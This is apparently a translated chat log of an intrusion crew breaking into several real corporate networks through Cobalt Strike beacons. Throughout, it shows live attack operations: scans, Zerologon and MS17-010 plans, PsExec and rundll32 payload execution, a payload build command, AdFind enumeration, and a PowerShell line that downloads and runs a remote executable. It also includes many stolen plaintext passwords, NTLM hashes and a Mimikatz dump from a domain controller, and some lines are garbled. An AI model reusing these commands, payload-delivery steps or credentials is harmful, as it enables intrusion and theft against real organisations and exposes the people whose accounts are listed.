by the way, i understand you did not take off AD, so you can, from the current domain through the trust, take off the kerbs of other domains.... like AD on trust domains?
there - where? how do i go there?
i have an idea, no. have you removed kerbs from trusts? there are 4 in the file. two in quarantine
trusts no?
well, there are more, and not sure?
I will try zerologon tomorrow. Tomorrow I will try to start zerologon - no more options left...
```
beacon> portscan 172.31.190.47 80,443,25,110,995,143,993,465 icmp 10
[*] Tasked beacon to scan ports 80,443,25,110,995,143,993,465 on 172.31.190.47
[+] host called home, sent: 93245 bytes
[+] received output:

[+] received output:
Scanner module is complete
```
Check the web ports and the ports of the mail service, for example.
```
>operatingSystem: Windows Server 2003
>operatingSystemVersion: 5.2 (3790)
>operatingSystemServicePack: Service Pack 2
>dNSHostName: DETADP01.gpj.loc
```
on specific hosts, the operating systems which you have in your AD, are they even registered? if they are empty - then the rest of the domain can already be scanned; if there is "empty", then sevens and 2008
under ms17-010, first choose an XP / 2003 machine
terrible selection criteria)))
this will be most effective, given that the other main paths we have tried)
I propose to ping all live hosts in the domain and ALL go to this exploit already with the creds of the domain user, to see if it is not connected to the IPC$ tree; does not only need to include verbose
and on what principle were these hosts selected?
so here, like, nothing has scanned ... no answers, no ....
and what was the output, if i could see which ones you randomly scanned?
just because we have domain creds - with them it is better to "start" on some OSes above 7
were there no machines in the domain vulnerable to this exploit?
and what about 17-010 at the end?
yes, at the end
we only have her pass - but it does not roll anywhere as an administrator, right?
```
[+] received output:
[+] Success! Username: SBolley. Password: thisduckingsucks!
[*] Completed.
```
What's the error?
```
ERROR: FindOne : Exception calling "FindOne" with "0" argument(s): "The server is not operational.
ERROR: "
ERROR:
ERROR: At line:145 char:36
ERROR: +     $user = $search.FindOne <<<< ()
ERROR:     + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
ERROR:     + FullyQualifiedErrorId : DotNetMethodException
ERROR:
ERROR: user : The variable '$user' cannot be retrieved because it has not been set.
ERROR:
ERROR: At line:146 char:22
ERROR: +     if ($user <<<<  -ne $null)
ERROR:     + CategoryInfo          : InvalidOperation: (user:Token) [], RuntimeException
ERROR:     + FullyQualifiedErrorId : VariableIsUndefined
```
interesting
```
[+] received output:
Parsing file: \\GPJ.LOC\sysvol\GPJ.LOC\policies\{20FA66DA-01F3-493D-A72B-23C077395633}\Machine\Preferences\Groups\Groups.xml
```
17-010 checked?
Gentlemen, how is it with the UAC bypass?
still no UAC bypassed?
Better let it be like this
```
Group name     Domain Admins
Comment        Designated administrators of the domain

Members

-------------------------------------------------------------------------------
ADAXES                   AMoultonADM              bigfix
ELittleADM               JStriberADM              pwwDirAdmin
TMunsonADM
```
Lest we forget, I wrote in #general
why don't you take everything off at once as a list?
2 times it reminds me
#local admin
```
Alias name     Administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator            GPJ\SBolley              GPJHelp
The command completed successfully.
```
local admins and enterprise?
This is easier than that.
```
beacon> net domain_controllers
[*] Tasked beacon to run net domain_controllers
[+] host called home, sent: 104518 bytes
[+] received output:
Domain Controllers:

 Server Name      IP Address
 -----------      ----------
```
This is all servers (filtered by ``Domain Controllers``)
```
DETMSDC02
TOKMSDC01
SHARMSDC01
SYDMSDC01
SNGMSDC01
NYCMSDC01
AUSMSDC01
```
```
SFOAMSDC01
DENMSDC01
LONMSDC02
BEIMSDC02
SHAMSDC02
BOSMSDC01
HKGMSDC01
STURMSDC01
PLNMSDC02
MELMSDC01
SHARMSDC02
STURMSDC10
STURMSDC20
ROCMSDC01
SFO2MSDC03
STUGMSDC03
STUGMSDC10
LAXMSDC01
```
Are the local admins? The enterprise, dc and ad infos? The domain admins
```
ELittleADM
JStriberADM
AMoultonADM
TMunsonADM
bigfix
ADAXES
pwwDirAdmin
```
user7 user5 user2
No session, only ran it again and as you wrote, inj will die right away, or later appear. injected dll and ekcts, then shut down the last server
```
beacon> shell ping francedc1
[*] Tasked beacon to run: ping francedc1
[+] host called home, sent: 45 bytes
[+] received output:

Pinging francedc1.rtpco.local [10.4.0.25] with 32 bytes of data:
Request timed out.
Request timed out.

[+] received output:
Request timed out.

[+] received output:
Request timed out.

Ping statistics for 10.4.0.25:
    Packets: Sent = 4, Received = 0, Lost = 4 (100% loss),

beacon> shell ping francedc1.rtpco.local
[*] Tasked beacon to run: ping francedc1.rtpco.local
[+] host called home, sent: 57 bytes
[+] received output:

Pinging francedc1.rtpco.local [10.4.0.25] with 32 bytes of data:
Request timed out.
Request timed out.

[+] received output:
Reply from 10.4.0.19: Destination host unreachable.

[+] received output:
Request timed out.

Ping statistics for 10.4.0.25:
    Packets: Sent = 4, Received = 1, Lost = 3 (75% loss),
```
This is for @user7
found 104....69480 pid
I say that there is one
I have all ahk stand, there is one live session that needs to be locked, so check the ping
- Check whether the registry entry was created with the beacon: shell reg query HKCU\Environment
to nasa cling to destroying
```
on 10 armas: 0 file(s) copied.
of them: no 445:
MFGWIN10-1: 10.0.0.110
ENGINEERING-PC2: 10.1.4.205
RYAN-GT73VR: 10.1.4.164
SCCY-LT07: 10.0.0.26
SCCY-05: 10.0.0.59
SCCY-01: 10.0.0.76
SCCY-03: 10.0.0.57
```
on dir under YES - Access is denied.
```
SCCY-20: 10.1.4.221
DESKTOP-UMQJ809: 10.1.4.230
```
us: SCCY-NAS: 10.1.4.175:445
shares: Approved_Documentation Engineering IPC$ Quality Tool_Room usbshare1
all except usbshare1 are masked
```
shell net use * \\10.1.4.175\usbshare1
The password is invalid for \\10.1.4.175\usbshare1.

shell net use * \\10.1.4.175\usbshare1 /user:SCCY\vdsadmin T@ng0D0wn!
System error 1219 has occurred.

Multiple connections to a server or shared resource by the same user, using more than one user name, are not allowed. Disconnect all previous connections to the server or shared resource and try again.
```
```
Total AD servers: 5
Live Servers: 2
Pulled servers: 2
Total armies in AD: 134
Live armies: 28
Artems attracted: 18
```
209.222.101.167:10918 uVTxvMXJAvo6Vxsuw6iFhfu6YtstdU9kKPV
Yeah, wait till 2 and then start giving it to you
OAFIJHS&GDFIysui76fUESY&GUISKRTjug
yeah, why not
cme smb 170.7.183.1 -u Administrator -p Csfixit3 --local-auth --lsa
to @tl2 can ask?
i can't figure out if it's the other one)
so it's not among them)
so did you check if it's alive?
```
Domain Controllers:

 Server Name      IP Address
 -----------      ----------
 DCWAS01          170.7.2.220
 TNWAS01          170.7.14.203
 FLWAS01          170.7.20.220
 UKWAS01          170.7.70.210
 FRWAS02          172.25.168.125
 DRWAS01          170.7.132.51
```
```
User name                    alexanm
Account active               No
```
```
User name                    binnsv
Account active               Yes
```
```
User name                    roeders
Account active               Yes
```
```
User name                    lucase
Account active               Yes
```
```
* Username : Administrator
* Domain   : WILSONART
* NTLM     : 2caf37093fda2e2d172732487707cd31
* Password : {}wallC2013
```
This was taken through CrackMapExec. Is this even ntlm?
found a live account?
.hhz, while we check it?
There sits yes - 170.7.183.1
192.168.1.6:445 - Success: '.\whsetup:Csfixit3' Administrator
༼ つ ◕_◕ ༽つ
normally xp/7/10
WORKSTATION\Administrator:Csfixit3
Even an administrator without rights) it's already on all the machines where it did not pass
the server is not among them?
great). Pass from the admin account and vhsfixit3
no) from the server?
```
Group name     Domain Admins
Comment        Designated administrators of the domain

Members

-------------------------------------------------------------------------------
adm-cavailj              adm-GrelleS              Administrator
alexanm                  bmccm                    fowlerh
lucase                   moorer2                  owensd
petersm2                 polyreyadmin             roeders
solarwindsarm.svc        vyombmccm
```
why don't you like cisks? are they on win-server? and the rest are bypassed
here try
here some cisks like those previous ones with the admin share bypassed all?
on these ten tens try to get patched zero here?
the answer is no, it's not.
the answer is no, it's nothing.
```
Connecting to 10.102.71.35...
Starting PSEXESVC service on 10.102.71.35...
Connecting with PsExec service on 10.102.71.35...
Starting powershell.exe on 10.102.71.35...
PsExec could not start powershell.exe on 10.102.71.35:
```
Where have been - yes, on all servers Symantec stands? tpsh?
with flags at startup it disappears; there moves zversky saymtek rub dll kuponjalma all so and replace to a point that, your messages you can delete yourself)
delete the case
this last flags with one minus, not rightly assembled
```
./shellConcatination --source=shellStarter_llvm_x64.dll --target=x64.dll --addBin=payload.bin -keep -self
```
collect llvm here with kip and selfnova clean.
23.82.140.215 https://expoless.com
----------------------------------------------------------------------------------------
104.171.123.166:45330 xubNIvoc8qkr10QFT2G68WprzDndxfBN0EP
empty file
change the Cobalt, does not work the same way as last time?
but it does not work, i used to build with the llvm builder, without the flag, that's what's saved in the notes command
are you still using the Cobalt cleaner?
you build llvm with your hands? it's more convenient without it
```
./shellConcatination --source=shellStarter_x64.dll --target=x64.dll --addBin=payload.bin
```
that it disappears, did you collect with what flag?
```
Shares for 170.7.5.54:
[--- Listable Shares ---]
ADMIN$ C$ D$ NxT$ NxTDeve$ NxTPyqa$ NxTTest$

Shares for 170.7.5.58:
[--- Listable Shares ---]
ADMIN$ C$ D$ NxT$ NxTDeve$ NxTPyqa$ NxTTest$

Shares for 170.7.5.57:
[--- Listable Shares ---]
ADMIN$ C$ D$ NxT$ NxTDeve$ NxTPyqa$ NxTTest$
```
Yes, and the dll disappears in both cases. The service starts and the session does not work too?
rundll32.exe C:\Windows\Temp\x64.dll,
why is it not separated by a comma?
in the tpsh?
now pinging, can see vnneshku?
in general, yes, let's check the server?
Symantec what edr? what kind of OS?
top session does not fly
start cobalt works?
```
beacon> remote-exec psexec 10.102.71.35 rundll32 C:\Windows\Temp\x64.dll entryPoint
[*] Tasked beacon to run 'rundll32 C:\Windows\Temp\x64.dll entryPoint' on 10.102.71.35 via Service Control Manager
[+] host called home, sent: 1805 bytes
[+] received output:
Started service 2aed3bf on 10.102.71.35
```
Hmmm, a psexec?
ERROR: Description = The RPC server is unavailable.
Check osvmik is available.
```
Shares for 10.102.71.35:
[--- Listable Shares ---]
ADMIN$ C$

Shares for 10.102.70.83:
[--- Listable Shares ---]
ADMIN$ C$

Shares for 10.102.72.34:
[--- Listable Shares ---]
ADMIN$ C$
```
hyperion_Service waglobal2014
this is where we already did it... search from here `*HYPERION_ADMIN`
```
Global Group memberships     *Austin_PW_Group      *HYPERION_ADMIN
                             *Domain Users
```
I gave a list.
```
shell wmic /node:78186W7P os get osarchitecture
[*] Tasked beacon to run: wmic /node:78186W7P os get osarchitecture
[+] host called home, sent: 72 bytes
[+] received output:
Node - 78186W7P
ERROR:
Description = Access is denied.
```
and don't flub like this
```
beacon> shell wmic /node:78186W7P os get osarchitecture
```
Admin \L79009W10P.Wilsonart.com/ADMIN$ - Remote Admin \\{\73689W7P.Wilsonart.com/ADMIN$ - Remote Admin \73923W7P.Wilsonart.com/ADMIN$ - Remote Admin \79214W10P.Wilsonart.com/ADMIN$ - Remote Admin \DCVEEAM02.Wilsonart.com/ADMIN$ - Remote Admin \ED79160W10P.Wilsonart.com/ADMIN$ - Remote Admin \76406W7E64.Wilsonart.com/ADMIN$ - Remote Admin \73860W7P.Wilsonart.com/ADMIN$ - Remote Admin \dcwas88.Wilsonart.com/ADMIN$ - Remote Admin \ES79799W10P64.Wilsonart.com/ADMIN$ - Remote Admin \78179W7P.Wilsonart.com/ADMIN$ - Remote Admin \75537W7P.Wilsonart.com/ADMIN$ - Remote Admin \76032W10E.Wilsonart.com/ADMIN$ - Remote Admin \75574W7P.Wilsonart.com/ADMIN$ - Remote Admin \\QABIHFM.Wilsonart.comADMIN$ - Remote Admin \\DDCWAS09.Wilsonart.comADMIN$ - Remote Admin \EL77610W10E.Wilsonart.com/ADMIN$ - Remote Admin \PRDBITAB.Wilsonart.com/ADMIN$ - Remote Admin \78220W7P.Wilsonart.com/ADMIN$ - Remote Admin \EL80150W10P64.Wilsonart.com/ADMIN$ - Remote Admin \LWDA-DC.Wilsonart.com/ADMIN$ - Remote Admin \78167W7P.Wilsonart.com/ADMIN$ - Remote Admin \DT01W7P64.Wilsonart.com/ADMIN$ - Remote Admin \78735W10E64.Wilsonart.com/ADMIN$ - Remote Admin \80109W10P.Wilsonart.com/ADMIN$ - Remote Admin \78140W7P.Wilsonart.com/ADMIN$ - Remote Admin ``170.7.5.11a well you do it in front of me 104.243.44.69:13574 Cqr7797e1iSJyzFwnyTPoECVpWqqOSUGUZ7 ``and the session under the token polzakaday access to kobud[ ](https://mediaeveryone.com/group/wilsonart-com?msg=SQHQuPXRXCcnJHStn) you mean to say that nothing shot?com/group/wilsonart-com?msg=eg7axbgv8FLsY22FG) yes it took out all the balls, not even available)) fucking laugh if you're laughing ishell dir \\\share\C$ does not give anything at alla?These balloons aren't opening. 
Is this the domain controller?
\\LWDA-DC.Wilsonart.com\ADMIN$ - Remote Admin
170.7.5.19
170.7.14.20469:1488 uy (
@tl2 there are no kerbs from here yet?
exe -nop -w hidden -ep bypass -e
http://45.126.210.66:8080/Bl0vJ08/231.msi
http://dropmefiles.com/XXwJl0
.dead.pkgprod.com
there's no one else to go to)
more like this: and you know what this means?) right!
adfind.exe -f "(objectcategory=person)" > ad_users.txt
adfind.exe -f "objectcategory=computer" > ad_computers.txt
adfind.exe -f "(objectcategory=organizationalUnit)" > ad_ous.txt
adfind.exe -subnets -f (objectCategory=subnet) > subnets.txt
adfind.exe -f "(objectcategory=group)" > ad_group.txt
adfind.exe -gcb -sc trustdmp > trustdmp.txt
"How is it 'get the right hell info'?"
and kerbs get the right hell info
do you know what it means?)) fuck, 30 trust administrations
no
da da
@tl2 do not forget to download
comps are downloaded
found on the machine TightVNC but where the configs, no idea
throw the standard output of programs
filez from different workstations and study the FS of workstations, exactly
need to search config
means somewhere is some VPN where almost anyone can go ... look for "correct" link to login
polya) lol
creeds of users in the browsers, more precisely
that if there are pointers to Citrix it makes sense to check the creeds of users' browsers
It seems that machines with Citrix as provides stable access thin clients also live alternative to VPN
Remote/Citrix/VPN something like that
in AD there are pointers to VPN?
in users or cars
we searched in neighboring computers - about 20-25 probably checked, no signs of software found (in other cases, it makes sense to search for relevant processes or signs of installed software)
@user1 well, this is for "native" vpn as i understand? so, what about the config? do you have a session? how to promote? it does not work with Citrix?
no sessions as i understand no?
parsing is working with the network via kmd, trying to raise the rights without backconnect
parsing is what?
1) dns tunneling
2) parsing WITHOUT EXTERNAL CONNECTION
This is where the fun part starts. we have two options really do not (no)))
now look whether there is no external at all?
tried powershell command generated input - seems to run but no session
they are swearing at something, and what I did not have time to understand
http://gist.github.com/ethack/110f7f46272447828352768e6cd1c4cb
through downloadstring and iche easier to do so, or rather not from a file but from a buffer
possible to make an intermediate input script which from a file will emulate keystrokes, did it when they had to without a buffer large lines to type manually = ))))
there clipboard does not work - any ideas how?
one of "chips" Citrix if the kmd is already running - it won't close even if the citrix session dies
http://cobaltstrike.com/help-externalc2
then the session will stay alive and if the kmd opens the host is back :confused:
Hello! :metal: hello everybody)
I think something like `powershell.exe -command PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile('https://drive.google.com/uc?export=download&id=0B1NUTMCAOKBTdVQzTXlUNHBmZUU',"$env:APPDATA\ps.exe");Start-Process ("$env:APPDATA\ps.exe")` NOT via rdp
I wrote above, startup of usual applications is logged simply, those which have already been marked as "current" plus if a user comes in at the time of the work and sees the new ones on his dashboard...
Well, in general there is no need)) and use those that are available, they "can" go up in the allowed applications, should not make changes
Passage to the webserver from the frontend, if it will be much later, it is a very vast topic and requires a fairly deep understanding of web technologies, well, at least when we are not talking about vulnerabilities of wordpress blogs = )
This "basic" checklist for citrix escape https://www.pentestpartners.com/security-blog/breaking-out-of-citrix-and-other-restricted-desktop-environments/
Citrix is a thin client, but still it is webvpn which is almost always tied up https://sf.primeinc.com/vpn/index.html ziegd SuperbowlChamps20
call kmd = ) NOT through rdp
na collective intelligence))
so, a practical task
pohyalnaya, now namut... we do not have
Good morning. Any live sessions for further practice?
Good morning, Monday at what time?
Send the code to the email
0.dead.snu.edu)) are there more networks?
in the appendix is spinning endlessly under all users and from several dedicates web page does not open (check all hosts account if it is valid somewhere - try to crash on rdp
"We should have taken the hash check off, not yes."
beacon> shell net use \\172.24.2.8\c$ "MountainD3w!" /user:GlobalTranz.local\joel.reed
[*] Tasked beacon to run: net use \\172.24.2.8\c$ "MountainD3w!" /user:GlobalTranz.local\joel.reed
[+] host called home, sent: 103 bytes
[+] received output:
System error 5 has occurred.
Access is denied.
But getting up would certainly be a good idea right now, imho.
tomorrow if everything survives - krepaneu quietly and you can go to the inspection
on any servachek you try there?
on dc
not over the e
probably all in a slip?
wrapping up
me here does not want to fly session from there)
only easier i will take tomorrow more vpns such
dobii tomorrow while i have no current access
then get up sooner
wrap up for today, here you and the entrance to another domain)
but you have to get up now and go to the other side of the house)
Pinging GlobalTranz.local [10.222.0.100] with 32 bytes of data:
Reply from 10.222.0.100: bytes=32 time=28ms TTL=127
Ping statistics for 10.222.0.100: Packets: Sent = 1, Received = 1, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 28ms, Maximum = 28ms, Average = 28ms
beacon> shell net use \\10.222.0.100\c$ "MountainD3w!" /user:GlobalTranz.local\joel.reed
[*] Tasked beacon to run: net use \\10.222.0.100\c$ "MountainD3w!" /user:GlobalTranz.local\joel.reed
[+] host called home, sent: 105 bytes
[+] received output:
The command completed successfully.
"in two domains admin GLOBALNET\joel.reed:MountainD3w!"
"If there pdk not in azure - then you can)"
dsinkat?)
do not)
well hashdamnapat I will not pdknut
I see hashes and kleer even see
not 2008 so there pdk 12 server
palets tired to moth)))))
why are you so with me?
Logon Server : ADC03-PHX01 Logon Time : 11/3/2020 8:35:31 AM SID : S-1-5-21-498103351-3997332795-3100871051-26749 msv : tspkg : wdigest : kerberos : ssp : credman : Authentication Id : 1 ; 462032229 (00000001:1b8a0d65) Session : RemoteInteractive from 19 User Name : ctrails Domain : GLOBALNET Logon Server : ADC03-PHX01 Logon Time : 10/28/2020 1:54:05 PM SID : S-1-5-21-498103351-3997332795-3100871051-5297 msv : tspkg : wdigest : kerberos : ssp : credman : Authentication Id : 0 ; 4281980067 (00000000:ff39d4a3) Session : RemoteInteractive from 18 User Name : sjose Domain : GLOBALNET Logon Server : ADC03-PHX01 Logon Time : 10/23/2020 10:17:14 AM SID : S-1-5-21-498103351-3997332795-3100871051-11974 msv : tspkg : wdigest : kerberos : ssp : credman : Authentication Id : 0 ; 4079058940 (00000000:f3217ffc) Session : Service from 0 User Name : g.boles Domain : GLOBALNET Logon Server : ADC03-PHX01 Logon Time : 10/21/2020 6:31:26 AM SID : S-1-5-21-498103351-3997332795-3100871051-15102 msv : [00000003] Primary * Username : g.boles * Domain : GLOBALNET * NTLM : 2a7f47acb7457f80dbb0818577a7a79b * SHA1 : 74aa69783329a7be32cdb00060a90c5cfbd7e0d3 [00010000] CredentialKeys * NTLM : 2a7f47acb7457f80dbb0818577a7a79b * SHA1 : 74aa69783329a7be32cdb00060a90c5cfbd7e0d3 tspkg : wdigest : * Username : g.boles * Domain : GLOBALNET * Password : (null) kerberos : * Username : g.boles * Domain : GLOBALNET.LOCAL * Password : (null) ssp : credman : Authentication Id : 0 ; 3660849891 (00000000:da3422e3) Session : RemoteInteractive from 13 User Name : sjose Domain : GLOBALNET Logon Server : ADC03-PHX01 Logon Time : 10/13/2020 8:51:02 AM SID : S-1-5-21-498103351-3997332795-3100871051-11974 msv : tspkg : wdigest : kerberos : ssp : credman : Authentication Id : 0 ; 3465255253 (00000000:ce8b9955) Session : Interactive from 14 User Name : DWM-14 Domain : Window Manager Logon Server : (null) Logon Time : 10/9/2020 1:34:11 PM SID : S-1-5-90-14 msv : [00000003] Primary * Username : ADC03-PHX01$ * Domain : 
GLOBALNET * NTLM : 12c4f1c0a7300d1f015d64e308229900 * SHA1 : ab62897a09ba3b99a035fbdfd87a6042126723d1 tspkg : wdigest : * Username : ADC03-PHX01$ * Domain : GLOBALNET * Password : (null) kerberos : * Username : ADC03-PHX01$ * Domain : globalnet.local * Password : 1f 3b 55 c9 37 d0 65 91 a9 b0 99 dd 52 ad b9 71 68 a8 3a dd 2e 17 19 78 f3 9f ac ba 06 d5 c0 d7 b0 09 20 61 e3 b5 a0 05 a3 c4 a9 25 cf 81 70 59 d4 b1 de 69 b1 c8 59 93 58 47 47 d2 5d 1e de f7 99 78 0e 96 d2 da a7 53 51 b4 84 bd a6 fa e2 d4 0b 81 41 1d 5c c4 c1 6d d5 28 91 02 cd e2 ba 83 ef 66 0a f0 79 9b dd 61 e5 77 f0 c9 97 b2 b5 a9 f7 7b 54 12 2a 07 43 7a 02 0f 93 d3 75 63 f4 b3 92 9d 6c 0e 18 a1 36 93 3b 73 e0 e1 12 f2 f3 e7 43 42 7f a4 a2 d6 13 29 60 cf ed 31 b0 57 48 94 09 60 28 60 93 75 54 33 aa f4 a4 67 ee be 09 ae 60 fa db cd 1d 14 35 21 13 dd 78 f2 ee 8a ba d3 72 76 4b 65 92 8a a4 05 03 83 09 9f 5d 26 e1 a2 63 dc 96 7a 2a 54 d0 c6 25 38 93 32 33 7d 72 54 4d aa 41 f5 20 e7 6f 36 ff da c0 73 01 14 3f c5 ssp : credman : Authentication Id : 0 ; 3411885558 (00000000:cb5d3df6) Session : RemoteInteractive from 1 User Name : jehad.jamalalldeen Domain : GLOBALNET Logon Server : ADC03-PHX01 Logon Time : 10/8/2020 3:00:26 PM SID : S-1-5-21-498103351-3997332795-3100871051-26749 msv : tspkg : wdigest : kerberos : ssp : credman : Authentication Id : 0 ; 504788382 (00000000:1e16759e) Session : RemoteInteractive from 7 User Name : sjose Domain : GLOBALNET Logon Server : ADC03-PHX01 Logon Time : 8/20/2020 11:56:26 PM SID : S-1-5-21-498103351-3997332795-3100871051-11974 msv : tspkg : wdigest : kerberos : ssp : credman : Authentication Id : 0 ; 116428327 (00000000:06f08e27) Session : RemoteInteractive from 4 User Name : ctrails Domain : GLOBALNET Logon Server : ADC03-PHX01 Logon Time : 8/14/2020 12:56:27 PM SID : S-1-5-21-498103351-3997332795-3100871051-5297 msv : tspkg : wdigest : kerberos : ssp : credman : Authentication Id : 0 ; 1181016 (00000000:00120558) Session : RemoteInteractive from 2 User Name : sjose 
Domain : GLOBALNET Logon Server : ADC03-PHX01 Logon Time : 8/12/2020 11:34:38 PM SID : S-1-5-21-498103351-3997332795-3100871051-11974 msv : tspkg : wdigest : kerberos : ssp : credman : Authentication Id : 0 ; 996 (00000000:000003e4) Session : Service from 0 User Name : ADC03-PHX01$ Domain : GLOBALNET Logon Server : (null) Logon Time : 8/12/2020 11:30:58 PM SID : S-1-5-20 msv : [00000003] Primary * Username : ADC03-PHX01$ * Domain : GLOBALNET * NTLM : 12c4f1c0a7300d1f015d64e308229900 * SHA1 : ab62897a09ba3b99a035fbdfd87a6042126723d1 tspkg : wdigest : * Username : ADC03-PHX01$ * Domain : GLOBALNET * Password : (null) kerberos : * Username : adc03-phx01$ * Domain : GLOBALNET.LOCAL * Password : (null) ssp : credman : Authentication Id : 0 ; 73224 (00000000:00011e08) Session : UndefinedLogonType from 0 User Name : (null) Domain : (null) Logon Server : (null) Logon Time : 8/12/2020 11:30:50 PM SID : msv : [00000003] Primary * Username : ADC03-PHX01$ * Domain : GLOBALNET * NTLM : 12c4f1c0a7300d1f015d64e308229900 * SHA1 : ab62897a09ba3b99a035fbdfd87a6042126723d1 tspkg : wdigest : kerberos : ssp : credman : Authentication Id : 1 ; 3842484810 (00000001:e507aa4a) Session : Interactive from 0 User Name : g.boles Domain : GLOBALNET Logon Server : ADC03-PHX01 Logon Time : 12/2/2020 12:01:27 AM SID : S-1-5-21-498103351-3997332795-3100871051-15102 msv : [00000003] Primary * Username : g.boles * Domain : GLOBALNET * NTLM : 2a7f47acb7457f80dbb0818577a7a79b * SHA1 : 74aa69783329a7be32cdb00060a90c5cfbd7e0d3 [00010000] CredentialKeys * NTLM : 2a7f47acb7457f80dbb0818577a7a79b * SHA1 : 74aa69783329a7be32cdb00060a90c5cfbd7e0d3 tspkg : wdigest : * Username : g.boles * Domain : GLOBALNET * Password : (null) kerberos : * Username : g.boles * Domain : globalnet.local * Password : Splat_9550! 
ssp : credman : Authentication Id : 1 ; 2401291807 (00000001:8f20ce1f) Session : RemoteInteractive from 27 User Name : sjose Domain : GLOBALNET Logon Server : ADC03-PHX01 Logon Time : 11/17/2020 10:27:35 PM SID : S-1-5-21-498103351-3997332795-3100871051-11974 msv : tspkg : wdigest : kerberos : ssp : credman : Authentication Id : 1 ; 1683096786 (00000001:645204d2) Session : RemoteInteractive from 24 User Name : jehad.jamalalldeen Domain : GLOBALNET Logon Server : ADC03-PHX01 Logon Time : 11/10/2020 3:12:11 PM SID : S-1-5-21-498103351-3997332795-3100871051-26749 msv : tspkg : wdigest : kerberos : ssp : credman : Authentication Id : 1 ; 1184016058 (00000001:4692a6ba) Session : RemoteInteractive from 22 User Name : sjose Domain : GLOBALNET Logon Server : ADC03-PHX01 Logon Time : 11/5/2020 7:30:15 AM SID : S-1-5-21-498103351-3997332795-3100871051-11974 msv : tspkg : wdigest : kerberos : ssp : credman : Authentication Id : 1 ; 462032262 (00000001:1b8a0d86) Session : RemoteInteractive from 19 User Name : ctrails Domain : GLOBALNET Logon Server : ADC03-PHX01 Logon Time : 10/28/2020 1:54:05 PM SID : S-1-5-21-498103351-3997332795-3100871051-5297 msv : tspkg : wdigest : kerberos : ssp : credman : Authentication Id : 0 ; 4281980116 (00000000:ff39d4d4) Session : RemoteInteractive from 18 User Name : sjose Domain : GLOBALNET Logon Server : ADC03-PHX01 Logon Time : 10/23/2020 10:17:14 AM SID : S-1-5-21-498103351-3997332795-3100871051-11974 msv : tspkg : wdigest : kerberos : ssp : credman : Authentication Id : 0 ; 4045964244 (00000000:f12883d4) Session : RemoteInteractive from 17 User Name : ctrails2 Domain : GLOBALNET Logon Server : ADC03-PHX01 Logon Time : 10/20/2020 5:00:44 PM SID : S-1-5-21-498103351-3997332795-3100871051-12967 msv : [00000003] Primary * Username : ctrails2 * Domain : GLOBALNET * NTLM : 5dccf338588af5e878393924440dd31b47 * SHA1 : 9d5cb5951028c851f4449ab582699851223ea290 [00010000] CredentialKeys * NTLM : 5dccf338588af5e878393924440dd31b47 * SHA1 : 
9d5cb5951028c851f4449ab582699851223ea290 tspkg : wdigest : * Username : ctrails2 * Domain : GLOBALNET * Password : (null) kerberos : * Username : ctrails2 * Domain : GLOBALNET.LOCAL * Password : (null) ssp : credman : Authentication Id : 0 ; 4045959606 (00000000:f12871b6) Session : Interactive from 17 User Name : DWM-17 Domain : Window Manager Logon Server : (null) Logon Time : 10/20/2020 5:00:44 PM SID : S-1-5-90-17 msv : [00000003] Primary * Username : ADC03-PHX01$ * Domain : GLOBALNET * NTLM : 12c4f1c0a7300d1f015d64e308229900 * SHA1 : ab62897a09ba3b99a035fbdfd87a6042126723d1 tspkg : wdigest : * Username : ADC03-PHX01$ * Domain : GLOBALNET * Password : (null) kerberos : * Username : ADC03-PHX01$ * Domain : globalnet.local * Password : 1f 3b 55 c9 37 d0 65 91 a9 b0 99 dd 52 ad b9 71 68 a8 3a dd 2e 17 19 78 f3 9f ac ba 06 d5 c0 d7 b0 09 20 61 e3 b5 a0 05 a3 c4 a9 25 cf 81 70 59 d4 b1 de 69 b1 c8 59 93 58 47 47 d2 5d 1e de f7 99 78 0e 96 d2 da a7 53 51 b4 84 bd a6 fa e2 d4 0b 81 41 1d 5c c4 c1 6d d5 28 91 02 cd e2 ba 83 ef 66 0a f0 79 9b dd 61 e5 77 f0 c9 97 b2 b5 a9 f7 7b 54 12 2a 07 43 7a 02 0f 93 d3 75 63 f4 b3 92 9d 6c 0e 18 a1 36 93 3b 73 e0 e1 12 f2 f3 e7 43 42 7f a4 a2 d6 13 29 60 cf ed 31 b0 57 48 94 09 60 28 60 93 75 54 33 aa f4 a4 67 ee be 09 ae 60 fa db cd 1d 14 35 21 13 dd 78 f2 ee 8a ba d3 72 76 4b 65 92 8a a4 05 03 83 09 9f 5d 26 e1 a2 63 dc 96 7a 2a 54 d0 c6 25 38 93 32 33 7d 72 54 4d aa 41 f5 20 e7 6f 36 ff da c0 73 01 14 3f c5 ssp : credman : Authentication Id : 0 ; 3751704448 (00000000:df9e7780) Session : RemoteInteractive from 16 User Name : sjose Domain : GLOBALNET Logon Server : ADC03-PHX01 Logon Time : 10/15/2020 1:35:54 AM SID : S-1-5-21-498103351-3997332795-3100871051-11974 msv : tspkg : wdigest : kerberos : ssp : credman : Authentication Id : 0 ; 3729906510 (00000000:de51db4e) Session : RemoteInteractive from 15 User Name : jehad.jamalalldeen Domain : GLOBALNET Logon Server : ADC03-PHX01 Logon Time : 10/14/2020 4:06:50 PM SID : 
S-1-5-21-498103351-3997332795-3100871051-26749 msv : tspkg : wdigest : kerberos : ssp : credman : Authentication Id : 0 ; 3288541437 (00000000:c40328fd) Session : RemoteInteractive from 12 User Name : joel.reed Domain : GLOBALNET Logon Server : ADC03-PHX01 Logon Time : 10/6/2020 10:44:37 AM SID : S-1-5-21-498103351-3997332795-3100871051-15177 msv : [00000003] Primary * Username : joel.reed * Domain : GLOBALNET * NTLM : 7d9d843800ed5d922b69507f2dd2cfda * SHA1 : 05dd7dca30cf4eabf92fcfd2e951e608dea3af9e [00010000] CredentialKeys * NTLM : 7d9d843800ed5d922b69507f2dd2cfda * SHA1 : 05dd7dca30cf4eabf92fcfd2e951e608dea3af9e tspkg : wdigest : * Username : joel.reed * Domain : GLOBALNET * Password : (null) kerberos : * Username : joel.reed * Domain : GLOBALNET.LOCAL * Password : (null) ssp : credman : Authentication Id : 0 ; 3288541401 (00000000:c40328d9) Session : RemoteInteractive from 12 User Name : joel.reed Domain : GLOBALNET Logon Server : ADC03-PHX01 Logon Time : 10/6/2020 10:44:37 AM SID : S-1-5-21-498103351-3997332795-3100871051-15177 msv : [00000003] Primary * Username : joel.reed * Domain : GLOBALNET * NTLM : 7d9d843800ed5d922b69507f2dd2cfda * SHA1 : 